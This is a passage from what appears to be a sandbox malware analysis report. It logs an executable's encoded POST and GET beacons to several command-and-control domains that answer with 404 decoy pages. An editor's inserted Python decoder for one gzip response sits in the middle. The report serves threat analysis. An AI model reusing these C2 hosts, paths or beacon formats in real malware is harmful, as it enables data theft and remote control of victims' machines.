Data Ascii: PHM8hj-=oH5aM1jkhdUjbtgnRQDDGV4p6YJhkgz0pZFvo74+zL3jA2WDDqkyoHx0GNY8/BIsce1dvQbZf/GO+undzBuqT98Bpo3ha5lKniACCEUuDq7E3eydlsDfVxf5l6OMJiSzZqtvT6bedvmd7WQjwrU0Q7LQHqFlyMjlpWeyjqNsR/Wy+w+0Iyo33Y/Io3LUtxUyxhgphrxUWaDLBGwt7a22cdPUgnWMC/8/i6m7BHJQvqCMbxGZdQBDXD9zWJCTLoskGNsv2RMxvHWhWIKX/wl2TXTRb90YX2hMRYwtZ30lkeKtW2ZXvh3RDV1qj8kkCI/uBlVmDPqLZYohSQDSpSAm7KaXtS9zQvMZRJuvqiVapT0/a2kzWZG9LryM75KFnNrdNsryfkevOQS6cOrTnjzylOE6fvPz0tJ1SSE4+pbaOlCWA1PKfmfQTnFnblHYdwEQBn62zbugVMFj6vvz3shXjfJCr5+OFHyeedqYPUqS3Z9c1v52QUTiCH5D4nTVLZgOSWHvXSfn4d4C4/Xnun79VqU1z6Nq+ZPZ/jmsbY/XMDzfREHVvHO4nFZQ9xoL5zyn3nnlY4h4YMZ5zqkCs/tuWt/qKsMwwElGszn64mMBKh0gO+AL0sR0W8ZHuevrBvY8UU7gKR9ws80u/J75kF+YzT0A35VFxBhKDbuSyeLo4srjTq8JzKNlpNCSGVpEMJUGZiiXMS+vhvd2dLLM7Lip+WJLf6J10YPBt0jcelyPy6Bh0MaGiqK7sf2qpRugN4YoUbhX91SWDO4FK7PLDRyrv/g3cYTz/QAfSA4QtQTaYAr/8zNxnUYm6FrWXS+br7Crts/ET5wiMhfFWtSdo9iQvg+xLS7eDOe05nOLssBcNDURMHxEMKeVi1uzPC++OCMlQJlD1ntvvMD+lyq78f8BJqKiLmhIoPcO4eaePqW2v3H3059mttINaa7ZnbkO0gG5X8mNauLbVTwAiY3dKKzV9JyAp6LTL4fQAfYf9IL6jfOR [TRUNCATED]
Timestamp: Dec 9, 2024 06:58:23.583564997 CET
Bytes transferred: 1236
Direction: IN
Data:
HTTP/1.1 404 Not Found
Date: Mon, 09 Dec 2024 05:58:23 GMT
Server: Apache
Content-Length: 16052
Connection: close
Content-Type: text/html


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  16 | 192.168.2.7 | 49984 | 203.161.42.73 | 80 | 5412 | C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Dec 9, 2024 06:58:25.029637098 CET | 560 | OUT | GET /n8su/?tHfx=9byl&PHM8hj-=lFR6PBva/PMsONRUUBzFKHYbuqVDpA3Go4dEt9E07rmpJDSADrt1qR4xH95d6yRrR+B0iSrIYOXOwv3G4XacVuIE8qbhb6NY234rB3YRB473z9LLt/rnbiO/m9aaM2mDRrx6Wavidd+l HTTP/1.1
                                                                                  Host: www.learniit.info
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                                                                  Dec 9, 2024 06:58:26.256148100 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                  Date: Mon, 09 Dec 2024 05:58:26 GMT
                                                                                  Server: Apache
                                                                                  Content-Length: 16052
                                                                                  Connection: close
                                                                                  Content-Type: text/html; charset=utf-8


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  17 | 192.168.2.7 | 49994 | 46.30.211.38 | 80 | 5412 | C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Dec 9, 2024 06:58:32.425932884 CET | 832 | OUT | POST /an5q/ HTTP/1.1
                                                                                  Host: www.bankseedz.info
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Origin: http://www.bankseedz.info
                                                                                  Referer: http://www.bankseedz.info/an5q/
                                                                                  Content-Length: 220
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Cache-Control: max-age=0
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                                                                  Dec 9, 2024 06:58:33.669060946 CET | 738 | IN | HTTP/1.1 404 Not Found
                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                  Date: Mon, 09 Dec 2024 05:58:33 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 564
                                                                                  Connection: close
                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  18 | 192.168.2.7 | 49995 | 46.30.211.38 | 80 | 5412 | C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Dec 9, 2024 06:58:35.089653015 CET | 852 | OUT | POST /an5q/ HTTP/1.1
                                                                                  Host: www.bankseedz.info
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Origin: http://www.bankseedz.info
                                                                                  Referer: http://www.bankseedz.info/an5q/
                                                                                  Content-Length: 240
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Cache-Control: max-age=0
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                                                                  Dec 9, 2024 06:58:36.369287014 CET | 738 | IN | HTTP/1.1 404 Not Found
                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                  Date: Mon, 09 Dec 2024 05:58:36 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 564
                                                                                  Connection: close
                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  19 | 192.168.2.7 | 49996 | 46.30.211.38 | 80 | 5412 | C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Dec 9, 2024 06:58:37.786781073 CET | 1865 | OUT | POST /an5q/ HTTP/1.1
                                                                                  Host: www.bankseedz.info
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Origin: http://www.bankseedz.info
                                                                                  Referer: http://www.bankseedz.info/an5q/
                                                                                  Content-Length: 1252
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Cache-Control: max-age=0
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                                                                  Data Raw: 50 48 4d 38 68 6a 2d 3d 73 76 56 45 73 67 65 43 61 79 6c 75 74 4b 4e 33 78 75 63 6c 51 37 49 66 35 33 59 66 48 52 50 49 4d 41 6a 74 76 39 34 6c 59 6a 4e 49 42 7a 4d 6e 4a 77 72 44 2b 48 36 75 33 2f 71 48 38 46 6f 33 49 51 51 6f 4f 72 4c 53 33 43 56 69 62 67 6c 33 61 74 37 48 58 49 71 59 4d 50 32 47 2f 49 68 45 54 79 39 59 53 77 6d 49 6e 35 2b 67 73 50 2f 31 61 68 4d 36 67 59 68 5a 38 58 51 78 56 55 73 43 50 67 6d 77 4a 64 48 38 54 77 41 74 37 36 52 68 6f 50 44 4d 46 6c 2f 73 76 66 64 2b 49 50 79 35 4e 63 35 73 53 46 6c 46 75 76 31 47 42 76 4f 6c 69 2b 6f 65 58 71 77 53 4e 6b 37 48 44 4d 52 62 31 57 73 6f 6c 32 53 4e 69 73 70 66 2f 61 41 6f 6f 2f 36 33 64 50 2f 2b 55 6c 55 69 43 77 2f 76 35 4d 69 62 78 4c 58 4c 4f 46 7a 6e 7a 79 6e 5a 52 77 39 78 49 69 38 39 42 53 38 62 5a 77 4f 43 6b 79 49 53 6f 34 74 4d 6e 4b 35 71 48 46 31 64 4e 48 32 65 70 38 64 44 39 4d 68 72 41 7a 34 38 73 65 6a 31 53 34 55 2b 64 43 54 69 47 79 44 31 36 79 71 76 70 64 6d 50 31 34 62 4a 46 79 4c 33 67 73 6d 64 4a 6b 6f 63 39 33 [TRUNCATED]
                                                                                   Data Ascii: PHM8hj-= [TRUNCATED]
                                                                                   Timestamp: Dec 9, 2024 06:58:39.013392925 CET | Bytes transferred: 738 | Direction: IN | Data:
                                                                                   HTTP/1.1 404 Not Found
                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                  Date: Mon, 09 Dec 2024 05:58:38 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 564
                                                                                  Connection: close
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                   Session ID: 20 | Source: 192.168.2.7:49997 | Destination: 46.30.211.38:80 | PID: 5412 | Process: C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exe
                                                                                   Timestamp: Dec 9, 2024 06:58:40.581815004 CET | Bytes transferred: 561 | Direction: OUT | Data:
                                                                                   GET /an5q/?PHM8hj-=ht9kvQ/be1JP/b8F6dsuUaMB3kIjPw/jKA2fsfIfXx0uGnoFDxCnsR3TxOuY1Ct1ICtwCZ7n9C9rVjVINs3eX7araPangYQRXR4uJHW7jN2yh/2XdhodgIRd1WkPDwc0LSaAOvXgTCEN&tHfx=9byl HTTP/1.1
                                                                                  Host: www.bankseedz.info
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                                                                   Timestamp: Dec 9, 2024 06:58:41.691179991 CET | Bytes transferred: 738 | Direction: IN | Data:
                                                                                   HTTP/1.1 404 Not Found
                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                  Date: Mon, 09 Dec 2024 05:58:41 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 564
                                                                                  Connection: close
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                   Session ID: 21 | Source: 192.168.2.7:49998 | Destination: 77.68.64.45:80 | PID: 5412 | Process: C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exe
                                                                                   Timestamp: Dec 9, 2024 06:58:47.507723093 CET | Bytes transferred: 841 | Direction: OUT | Data:
                                                                                   POST /ugyg/ HTTP/1.1
                                                                                  Host: www.dietcoffee.online
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Origin: http://www.dietcoffee.online
                                                                                  Referer: http://www.dietcoffee.online/ugyg/
                                                                                  Content-Length: 220
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Cache-Control: max-age=0
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                                                                  Data Raw: 50 48 4d 38 68 6a 2d 3d 6c 41 78 43 52 68 77 46 54 70 53 2f 4f 71 52 51 51 79 41 67 31 7a 55 4f 50 55 58 65 44 5a 52 44 63 58 78 51 4b 38 53 63 70 6a 73 33 44 39 43 69 2b 4d 42 69 61 7a 72 51 74 52 32 43 30 77 74 6c 33 2b 4b 73 77 5a 56 70 41 67 61 6b 37 6e 6d 30 71 45 79 44 54 4a 6a 51 75 5a 52 64 4a 54 6b 4f 49 7a 64 66 43 73 52 4d 70 79 42 62 44 78 48 71 6a 73 52 62 77 6a 73 33 30 39 6b 4e 62 36 31 46 4c 6d 70 75 34 72 74 4c 61 4b 44 4e 48 58 38 71 79 52 74 4d 58 45 73 57 58 4d 61 36 46 43 58 66 4b 5a 74 35 6f 69 51 44 6b 62 6c 4b 6a 54 39 63 43 46 46 36 47 37 6c 4f 6f 46 43 66 6c 41 72 31 6e 2b 71 32 6d 68 67 6a 30 66 68 50 36 6b 6f 4f 6c 51 3d 3d
                                                                                  Data Ascii: PHM8hj-=lAxCRhwFTpS/OqRQQyAg1zUOPUXeDZRDcXxQK8Scpjs3D9Ci+MBiazrQtR2C0wtl3+KswZVpAgak7nm0qEyDTJjQuZRdJTkOIzdfCsRMpyBbDxHqjsRbwjs309kNb61FLmpu4rtLaKDNHX8qyRtMXEsWXMa6FCXfKZt5oiQDkblKjT9cCFF6G7lOoFCflAr1n+q2mhgj0fhP6koOlQ==
                                                                                   Timestamp: Dec 9, 2024 06:58:48.580648899 CET | Bytes transferred: 391 | Direction: IN | Data:
                                                                                   HTTP/1.1 404 Not Found
                                                                                  Server: nginx/1.25.3
                                                                                  Date: Mon, 09 Dec 2024 05:58:48 GMT
                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Content-Encoding: gzip
                                                                                  Data Raw: 62 33 0d 0a 1f 8b 08 00 00 00 00 00 04 03 4d 8e cd 0e 82 30 10 84 ef 7d 8a 95 bb 2c 1a 8e 4d 0f f2 13 49 10 89 29 07 8f 98 56 4a 82 14 69 d1 f0 f6 16 b8 78 9c 9d 99 6f 96 ee e2 6b c4 ef 65 02 67 7e c9 a1 ac 4e 79 16 81 b7 47 cc 12 9e 22 c6 3c de 9c a3 1f 20 26 85 c7 08 55 f6 d5 31 aa 64 2d 9c b0 ad ed 24 0b 83 10 0a 6d 21 d5 53 2f 28 6e 47 42 71 0d d1 87 16 f3 d2 3b b0 bf 8c 53 84 0e 8c 2b 09 a3 7c 4f d2 58 29 a0 ba e5 80 53 33 37 08 df da 40 ef 90 cf 05 09 ba 07 ab 5a 03 46 8e 1f 39 fa 14 07 d7 c6 15 ec 56 96 87 c8 0f f1 1a 79 64 cb 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                   Data Ascii: b3M0},MI)VJixokeg~NyG"< &U1d-$m!S/(nGBq;S+|OX)S37@ZF9Vyd0 (not printable: the body is chunked, the first line "b3" is the chunk size 0xb3 = 179 bytes, followed by a gzip stream starting 1f 8b whose trailer cb 00 00 00 announces 203 bytes uncompressed)
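The response body in this session is not garbled: the Data Raw bytes are an HTTP/1.1 chunked body (first line 62 33 = "b3", the chunk size 0xb3 = 179) wrapping a gzip stream (1f 8b), whose last four bytes cb 00 00 00 give the uncompressed length, 203 bytes. Added example, not part of the Joe Sandbox report: a Python decoder that reassembles the chunks, reads the RFC 1952 envelope and inflates it so the real 404 page can be read offline. The hex is copied verbatim from the report's Data Raw line for this session; the dechunk and header-parsing functions are the editor's.

```python
"""Decode a captured chunked + gzip HTTP response body offline.

Added example, not part of the Joe Sandbox report. CAPTURED_BODY_HEX is the
report's own Data Raw dump of the 404 that www.dietcoffee.online returned to
the POST beacon (Transfer-Encoding: chunked, Content-Encoding: gzip).
"""
import gzip
import struct

# Copied verbatim from the report's "Data Raw" line for session 21.
CAPTURED_BODY_HEX = (
    "62 33 0d 0a "
    "1f 8b 08 00 00 00 00 00 04 03 "
    "4d 8e cd 0e 82 30 10 84 ef 7d "
    "8a 95 bb 2c 1a 8e 4d 0f f2 13 "
    "49 10 89 29 07 8f 98 56 4a 82 "
    "14 69 d1 f0 f6 16 b8 78 9c 9d "
    "99 6f 96 ee e2 6b c4 ef 65 02 "
    "67 7e c9 a1 ac 4e 79 16 81 b7 "
    "47 cc 12 9e 22 c6 3c de 9c a3 "
    "1f 20 26 85 c7 08 55 f6 d5 31 "
    "aa 64 2d 9c b0 ad ed 24 0b 83 "
    "10 0a 6d 21 d5 53 2f 28 6e 47 "
    "42 71 0d d1 87 16 f3 d2 3b b0 "
    "bf 8c 53 84 0e 8c 2b 09 a3 7c "
    "4f d2 58 29 a0 ba e5 80 53 33 "
    "37 08 df da 40 ef 90 cf 05 09 "
    "ba 07 ab 5a 03 46 8e 1f 39 fa "
    "14 07 d7 c6 15 ec 56 96 87 c8 "
    "0f f1 1a 79 64 cb 00 00 00 "
    "0d 0a 30 0d 0a 0d 0a"
)


def dechunk(data: bytes) -> bytes:
    """Reassemble an HTTP/1.1 chunked body up to the zero-length terminator chunk."""
    out, pos = bytearray(), 0
    while True:
        eol = data.index(b"\r\n", pos)
        size = int(data[pos:eol].split(b";", 1)[0], 16)  # hex size; chunk extensions ignored
        pos = eol + 2
        if size == 0:
            return bytes(out)
        out += data[pos:pos + size]
        pos += size
        if data[pos:pos + 2] != b"\r\n":
            raise ValueError("chunk data not followed by CRLF")
        pos += 2


def gzip_header(stream: bytes) -> dict:
    """Read the RFC 1952 fixed header and the CRC32/ISIZE trailer without inflating.

    Useful on its own for triage: ISIZE tells you how big the real body is, and
    XFL/OS tell you which compressor produced it, before any decompression runs.
    """
    magic, cm, flg, mtime, xfl, os_id = struct.unpack("<HBBIBB", stream[:10])
    if magic != 0x8B1F or cm != 8:
        raise ValueError("not a gzip/deflate stream")
    crc32, isize = struct.unpack("<II", stream[-8:])
    return {"flags": flg, "mtime": mtime, "xfl": xfl, "os": os_id,
            "crc32": crc32, "isize": isize}


def decode_body(raw: bytes) -> tuple[dict, bytes]:
    """Dechunk, inspect the gzip envelope, then inflate (gzip checks CRC32 and ISIZE)."""
    stream = dechunk(raw)
    info = gzip_header(stream)
    plain = gzip.decompress(stream)
    if len(plain) != info["isize"]:
        raise ValueError("decompressed length disagrees with ISIZE trailer")
    return info, plain


if __name__ == "__main__":
    info, plain = decode_body(bytes.fromhex(CAPTURED_BODY_HEX))
    print(info)
    print(plain.decode("iso-8859-1"))
```

The ISIZE in the trailer, 203 bytes, is the same size as the uncompressed 404 page the same server sends in plain text a few sessions later (Content-Length: 203), so the compressed and plain decoys are the same page. A 404 from any of these hosts says nothing about whether that host is live C2 or a decoy; decoding the body only confirms there is no payload in it.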


                                                                                   Session ID: 22 | Source: 192.168.2.7:49999 | Destination: 77.68.64.45:80 | PID: 5412 | Process: C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exe
                                                                                   Timestamp: Dec 9, 2024 06:58:50.169137955 CET | Bytes transferred: 861 | Direction: OUT | Data:
                                                                                   POST /ugyg/ HTTP/1.1
                                                                                  Host: www.dietcoffee.online
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Origin: http://www.dietcoffee.online
                                                                                  Referer: http://www.dietcoffee.online/ugyg/
                                                                                  Content-Length: 240
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Cache-Control: max-age=0
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                                                                  Data Raw: 50 48 4d 38 68 6a 2d 3d 6c 41 78 43 52 68 77 46 54 70 53 2f 66 36 68 51 56 54 41 67 77 54 55 4e 42 30 58 65 4a 35 51 45 63 58 39 51 4b 2b 2b 4d 71 58 41 33 44 63 79 69 77 74 42 69 64 7a 72 51 30 68 32 48 70 41 74 75 33 35 44 47 77 64 56 70 41 67 4f 6b 37 6e 32 30 71 54 6e 78 54 5a 6a 53 6c 35 52 49 55 44 6b 4f 49 7a 64 66 43 74 30 70 70 79 5a 62 44 6b 58 71 67 4e 52 59 75 7a 74 46 69 4e 6b 4e 52 71 31 4a 4c 6d 70 4d 34 6f 70 6c 61 50 48 4e 48 57 4d 71 79 45 52 4e 65 45 73 63 49 63 61 76 56 77 57 67 56 70 38 43 6e 55 59 2f 6b 59 56 56 6d 6c 38 2b 59 6e 4a 57 59 71 64 31 73 48 6d 70 79 6d 32 41 6c 2f 75 75 72 44 55 43 72 6f 45 6c 33 32 4a 4b 7a 6c 45 6c 4b 4d 6b 64 69 61 4e 59 57 78 65 72 37 34 43 77 6c 6c 59 3d
                                                                                  Data Ascii: PHM8hj-=lAxCRhwFTpS/f6hQVTAgwTUNB0XeJ5QEcX9QK++MqXA3DcyiwtBidzrQ0h2HpAtu35DGwdVpAgOk7n20qTnxTZjSl5RIUDkOIzdfCt0ppyZbDkXqgNRYuztFiNkNRq1JLmpM4oplaPHNHWMqyERNeEscIcavVwWgVp8CnUY/kYVVml8+YnJWYqd1sHmpym2Al/uurDUCroEl32JKzlElKMkdiaNYWxer74CwllY=
                                                                                   Timestamp: Dec 9, 2024 06:58:51.388591051 CET | Bytes transferred: 391 | Direction: IN | Data:
                                                                                   HTTP/1.1 404 Not Found
                                                                                  Server: nginx/1.25.3
                                                                                  Date: Mon, 09 Dec 2024 05:58:51 GMT
                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Content-Encoding: gzip
                                                                                  Data Raw: 62 33 0d 0a 1f 8b 08 00 00 00 00 00 04 03 4d 8e cd 0e 82 30 10 84 ef 7d 8a 95 bb 2c 1a 8e 4d 0f f2 13 49 10 89 29 07 8f 98 56 4a 82 14 69 d1 f0 f6 16 b8 78 9c 9d 99 6f 96 ee e2 6b c4 ef 65 02 67 7e c9 a1 ac 4e 79 16 81 b7 47 cc 12 9e 22 c6 3c de 9c a3 1f 20 26 85 c7 08 55 f6 d5 31 aa 64 2d 9c b0 ad ed 24 0b 83 10 0a 6d 21 d5 53 2f 28 6e 47 42 71 0d d1 87 16 f3 d2 3b b0 bf 8c 53 84 0e 8c 2b 09 a3 7c 4f d2 58 29 a0 ba e5 80 53 33 37 08 df da 40 ef 90 cf 05 09 ba 07 ab 5a 03 46 8e 1f 39 fa 14 07 d7 c6 15 ec 56 96 87 c8 0f f1 1a 79 64 cb 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                   Data Ascii: b3M0},MI)VJixokeg~NyG"< &U1d-$m!S/(nGBq;S+|OX)S37@ZF9Vyd0 (not printable: chunked gzip body, byte-identical to the one returned in session 21; 179-byte chunk, 203 bytes uncompressed)


                                                                                   Session ID: 23 | Source: 192.168.2.7:50000 | Destination: 77.68.64.45:80 | PID: 5412 | Process: C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exe
                                                                                   Timestamp: Dec 9, 2024 06:58:52.838119030 CET | Bytes transferred: 1874 | Direction: OUT | Data:
                                                                                   POST /ugyg/ HTTP/1.1
                                                                                  Host: www.dietcoffee.online
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US
